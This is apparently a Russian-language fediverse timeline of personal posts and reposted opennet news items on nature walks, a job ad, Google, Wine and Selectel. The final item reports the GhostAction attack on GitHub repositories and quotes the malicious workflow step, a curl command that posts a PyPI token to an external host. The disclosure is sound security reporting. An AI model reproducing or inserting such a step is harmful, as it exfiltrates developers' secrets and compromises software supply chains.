home tags events about login

continue rss

mail: continue@to.any-key.press
pgp public key: https://honk.any-key.press/d/3K2g15qPqYR63ng8mm.txt

=> gemini://any-key.press 
=> https://got.any-key.press

Ученики его спросили его; они сказали ему: Хочешь ли ты, чтобы мы постились, и как нам молиться, давать милостыню и воздерживаться в пище? Иисус сказал: Не лгите, и то, что вы ненавидите, не делайте этого. Ибо все открыто перед небом. Ибо нет ничего тайного, что не будет явным, и нет ничего сокровенного, что осталось бы нераскрытым.

Евангелие от Фомы

continue honked 12 Sep 2025 21:40 +0200

#сегодня воочию убедился, что банкоматы Т работают на винде: эта сволочь списала деньги, а перед тем как выдать нал ушла в перезагрузку

continue bonked 12 Sep 2025 21:38 +0200
original: contrinitiator@honk.any-key.press

К потаенному финскому озеру отправились ещё засветло, но сейчас очень уж быстро темнеет, а луна уже ущербная и прячется за лесом. Поэтому шли с искусственным светом, или при свете луны, когда она позволяла, а за нами наблюдали ветви и коряги с глазами, а также следовали десятки котов (не шучу). Озеро дало насладиться тишиной, туманом и криками предрассветных птиц.

#ЛенинградНутряной #nature #lake

Озеро, чья поверхность почти полностью скрыта туманом. На противоположном берегу видны величественные сосны, чьи вершины в предрассветном свете вздымаются над туманным облаком.

continue bonked 12 Sep 2025 18:18 +0200
original: contrinitiator@metalhead.club

Посчастливилось увидеть фулиго гнилостный, он же муравьиное масло (на масло и впрямь по консистенции похож). Видимо, через несколько часов он (видимая часть) исчезнет. На пне, кстати, ясно видно, что гриб ещё недавно был больше.
#mushtodon #FungiFriday

Сфотографированное вблизи плодовое тело Fuligo septica ярко-оранжевого цвета, проявившееся на трухлявом пне. Вокруг плодового тела видны оранжевые следы, которые говорят о том, что ещё недавно гриб был больше в размерах.

continue bonked 11 Sep 2025 16:10 +0200
original: lost_enchanter@mastodon.online

Hello internet,

Company where I'm currently employed in is in dire need of the power engineer with industry experience.

We are an IT company, which works a lot with energy suppliers, providing software for them on different levels. We are currently switching to Common Information Model and need someone to validate, which parts of it are applicable to our situation.

One-time paid consultation is required, but I believe a year long contract is also possible.

Repost is appreciated.

#jobs

continue bonked 11 Sep 2025 11:10 +0200
original: opennet@honk.any-key.press

Google ограничил доступ к поиску для браузеров без JavaScript

В конце 2024 года у части пользователей попытки поиска в Google при отключённом JavaScript стали приводить к перенаправлению на страницу с требованием включить в браузере JavaScript. В январе 2025 года выборочное тестирование запрета обращения без JavaScript закончилось и ограничение распространили на всех пользователей, оставив при этом несколько лазеек. Например, возможность обращения к поисковой системе из браузеров без JavaScript сохранялась при смене User-Agent на "Lynx" или старую версию Firefox (не больше 23). Теперь данные лазейки перестали работать и страницы с требованием включения JavaScript или обновления устаревшей версии браузера выводятся при любых значениях User-Agent.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63859

continue bonked 11 Sep 2025 10:43 +0200
original: dside@mastodon.ml

@shura @linuxoid иногда хочется вбросить, что это всё четырёхмерные шахматы и Макс ругают за фигню специально, чтобы когда его ругают *не* за фигню, это терялось в океане фигни и не ломало оперы "ругают его только идиоты и предатели".

Но это уже конспирология.

continue bonked 11 Sep 2025 10:34 +0200
original: opennet@honk.any-key.press

OpenFix от Selectel: вознаграждения за переписывание на Rust, создание deb-пакетов и исправление ошибок в СПО

Компания Selectel, развивающая Linux-дистрибутив Selectel OS на пакетной базе Debian, представила инициативу OpenFix, в рамках которой начнёт выплачивать энтузиастам денежные вознаграждения за участие в работе над задачами, связанными с развитием и исправлением ошибок в открытом ПО. Код выполненных проектов будет публиковаться под пермиссивной лицензией с сохранением авторства участников.

Предложено три направления деятельности, выполнение задач в которых Selectel готов оплачивать:

  • Переписывание известных открытых проектов на язык Rust. В настоящее время доступны три задачи, связанные с переписыванием с языка Си на Rust кода проектов xz, c-ares и libxml2 c сохранением поведения оригинала.

    Вознаграждение за переписывание библиотек libxml2 и c-ares и определено в 350 тысяч рублей, а библиотеки xz в 200 тысяч рублей, но в случае xz указано, что достаточно переписать критические части библиотечных обвязок и связать с существующей Си-реализацией алгоритма LZMA.

  • Формирование и последующее сопровождение (подготовка обновлений) пакетов для Debian GNU/Linux. Приложения для которых предлагается создать deb-пакеты (c опциональным продвижением созданного пакета в Debian Unstable): apache-pulsar, bash-it, bazel, bitwarden-cli, composefs, cve-bin-tools, doh-cli, dupd, dyff, firecracker, griddb, jailhouse, keycloak, oauth2-proxy, phoronix-testsuite, photodedupe, purritobin, shh, skim, sssh-tpm-agent, uv, vaultwarden.

    Размер вознаграждения от 30 до 160 тысяч рублей. Премии меньше 50 тысяч рублей определены для uv, dyff, doh-cli, purritobin и bash-it, а больше 100 тысяч для jailhouse, bazel, sssh-tpm-agent, keycloak, griddb, firecracker и apache-pulsar.

  • Исправление ошибок в существующих открытых проектах. Участники на своё усмотрение могут выбирать проблемы, подтверждённые в системах отслеживания ошибок Debian и Ubuntu (Launchpad), после чего согласовать возможность получения вознаграждения за их исправление с Selectel.

    Вознаграждения назначается индивидуально и выплачивание после принятия изменения в Debian или Ubuntu и закрытия сообщения об ошибке.



Источник: https://www.opennet.ru/opennews/art.shtml?num=63863

continue bonked 11 Sep 2025 10:23 +0200
original: AdamOnza@mastodon.online

The MK-61 #Soviet #calculator has stack operations like + (as in #forth x y -- x+y)
"Cx" (Zero out top value x -- 0)
"<->", swap (T Z Y X -- T Z X Y)
"->", which is something like rot (T Z Y X -- X T Z Y)
"^" which is like dup (x -- x x)
So, for Z,Y,X = 1,2,3 how to reverse it to 3,2,1 with just those operations?

My answer:
^ -> Cx + <->
1 2 3
^ 1 2 3 3
-> 3 1 2 3
Cx 3 1 2 0
+ 3 1 2
<-> 3 2 1 🕶️

continue honked 09 Sep 2025 12:15 +0200

По радио @punkirratia играет группа "Теплая трасса". Это знак, надо послушать что они за посленее время записали

continue bonked 09 Sep 2025 10:48 +0200
original: n0icz@mastodon.ml

несу похвастаться штуку, нраица как получилось.
в последнее время очень тянет делать всякие штуки руками. откопала в залежах брелок-фермуар, к которому я когда-то начинала плести маленькую кольчужную сумочку, решила доплести. тут есть несколько неочевидных инженерных решений которыми я горжусь :>
карабин не очень подходящий, но это так для примера. я не уверена, оставить это брелком или например сделать цепочку чтоб вешать на шею, хз. я вообще хз че с этой штукой делать, я всякие такие цацки не оч ношу, но оно слишком прикольное получилось чтобы просто валяться в столе...

надо наверн тег завести для всякого рукотворного чтоб потом посты пересматривать и думать какая я молодец. ну пусть будет #ноикз_крафтит, я хз

continue bonked 08 Sep 2025 18:27 +0200
original: kidchai@mastodon.ml

Узнала, что термос — это название компании, которое перекочевало в нарицательные существительные, также как ксерокс и памперс. Так что любители называть вещи своими именами могут купить себе термос, на котором будет написано thermos.

Маленький термос для еды, на котором написано thermos.

continue bonked 08 Sep 2025 12:52 +0200
original: FediFollows@social.growyourown.services

p.s. If a FediGroup you want isn't listed and you want to start one, go to the application form on the front page of the FediGroup website:

➡️ https://about.fedigroups.social/home

Unlike Guppe, FediGroup has proper group owners and these are the people who start the groups and choose their settings. The owner can optionally moderate who is a member and optionally set the group to only boost members' posts.

Also, anyone can mention FediGroups without posting to them by adding ! before the group address.

continue bonked 07 Sep 2025 17:34 +0200
original: contrinitiator@honk.any-key.press

Продолжили исследование разлива Охты, у плотины, на сей раз посетив противоположный берег.

Благоустройство нечестивое и богохульное, как обычно. На небольшом пригорке с нескрываемой заботой о маломобильных гражданах сооружён многоэтажный озабореный пандус, настолько узкий, что диву даёшься. В принципе, можно было даже предсказать, что там будет ещё - живые деревья и кусты уничтожены, спуски к воде перекрыты, везде заборы и перекрытия, естественные тропинки зарыты, вместо них типовые деревянные настилы и велодорожки, по которым вереницей едут и идут жители с видом туристов, как будто, впервые побывавшие в этих краях (знаю таких, кто прожил не одно десятилетие рядом с Охтой, но выбрался туда впервые, и то только после «облагораживания»).

Я же напротив в таких разлинованных местах ощущаю себя максимально странно и неуютно.
Что-то человеческое осталось только на диких территориях – пансионате, откуда к нам пришёл крайне ласковый котище, немного примиривший с жизнью – и территории автоцентра, где виднеется то старая изгородь, то тропинка со скамеечкой.

Мне казалось, что с этой стороны реки тоже были пороховые погреба, но даже если и так, то от них либо ничего не осталось, либо они находятся на всё ещё закрытой территории. А вот рядом с рыбацким спуском к воде я обнаружил характерные ямки, как будто кто-то прошёлся с металлоискателем. Немного походив, даже нашёл там какую-то странную металлическую штуковину (похоже на медь или бронзу) продолговатой формы, возможно какой-то свисток. Надо будет попробовать очистить. Забавно, что почти сразу я увидел какую-то странную фигуру на противоположном берегу реки, там, где был знаменитый Сотонинский храм. Сначала я подумал, что это очередной посетитель, но хотя фигура была на удивление неподвижной, лица мне разглядеть не удавалось. Ничего не было видно и на фотографии, которую я сделал на длиннофокусный объектив: изображение оказалось размытым, хотя погоды стоят солнечные. Надеюсь, существо не будет преследовать меня до дома!

(#ленинграднутряной)

continue bonked 07 Sep 2025 08:43 +0200
original: kiffa@mastodon.ml

Сегодняшняя тема инсталляции - повторки крабиков из Магнита

Продолжение обложки альбома The fat of the land в виде крабиков из конструктора

continue bonked 06 Sep 2025 16:51 +0200
original: opennet@honk.any-key.press

В Wine интегрирована поддержка ntsync для повышения производительности игр

В кодовую базу Wine, на основе которой через неделю будет сформирован выпуск 10.15, добавлена поддержка драйвера ntsync, позволяющего существенно поднять производительность Windows-игр, запускаемых при помощи Wine. Драйвер входит в состав ядра Linux начиная с выпуска 6.14 и реализует символьное устройство /dev/ntsync и набор примитивов для синхронизации, применяемых в ядре Windows NT.

Значительный прирост производительности достигается благодаря избавлению от накладных расходов, связанных с применением RPC в пространстве пользователя. Например, при использовании драйвера ntsync по сравнению с реализацией примитивов синхронизации NT в пространстве пользователя максимальный FPS в игре Dirt 3 увеличился на 678%, в игре Resident Evil 2 - на 196%, Tiny Tina's Wonderlands - на 177%, Lara Croft: Temple of Osiris - на 131%, Call of Juarez - на 125%, The Crew - на 96%, Forza Horizon 5 - на 48%, Anger Foot - на 43%.

Для задействования оптимизированных примитивов синхронизации в Wine необходимо включить модуль ядра ntsync, который отключён по умолчанию. Для активации можно добавить файл конфигурации /etc/modules-load.d/ntsync.conf, содержащий строку "ntsync" и перезапустить систему или вручную загрузить модуль командой "sudo modprobe ntsync". Для работы требуется как минимум ядро Linux 6.14.

Чтобы убедиться, что ntsync действительно работает, необходимо что-нибудь запустить в Wine. Например, достаточно выполнить команду "winecfg", после чего запустить "lsof /dev/ntsync" и убедиться, что в выводе присутствуют процессы wine, использующие ntsync. Например:

   $ lsof /dev/ntsync

   COMMAND      PID USER FD   TYPE DEVICE SIZE/OFF NODE NAME
   start.exe 658466 user 12r   CHR 10,260      0t0  630 /dev/ntsync
   services. 658474 user 11r   CHR 10,260      0t0  630 /dev/ntsync
   explorer. 658484 user 11r   CHR 10,260      0t0  630 /dev/ntsync
   winedevic 658499 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   svchost.e 658552 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   plugplay. 658557 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   winedevic 658605 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   conhost.e 658623 user 11r   CHR 10,260      0t0  630 /dev/ntsync
   winecfg.e 658625 user 11r   CHR 10,260      0t0  630 /dev/ntsync



Источник: https://www.opennet.ru/opennews/art.shtml?num=63830

continue bonked 06 Sep 2025 16:49 +0200
original: opennet@honk.any-key.press

В ходе атаки GhostAction скомпрометировано 817 репозиториев на GitHub

Исследователи из компании GitGuardian выявили массовую атаку на пользователей GitHub, в ходе которой был получен контроль над 327 учётными записями и осуществлена подстановка вредоносного обработчика Github Action в 817 репозиториев. Атака привела к утечке 3325 секретов, используемых в системах непрерывной интеграции и передаваемых через переменные окружения, включая токены доступа к PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам.

GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub. Например, при помощи GitHub Actions можно выполнить определённые проверки и тесты при совершении коммитов или автоматизировать обработку новых Issues. Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющем Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page

Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер вредоносные коммиты были отменены примерно в 100 репозиториях. В настоящее время при поиске в GitHub определяется 671 коммит с вредоносным Github Action.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63831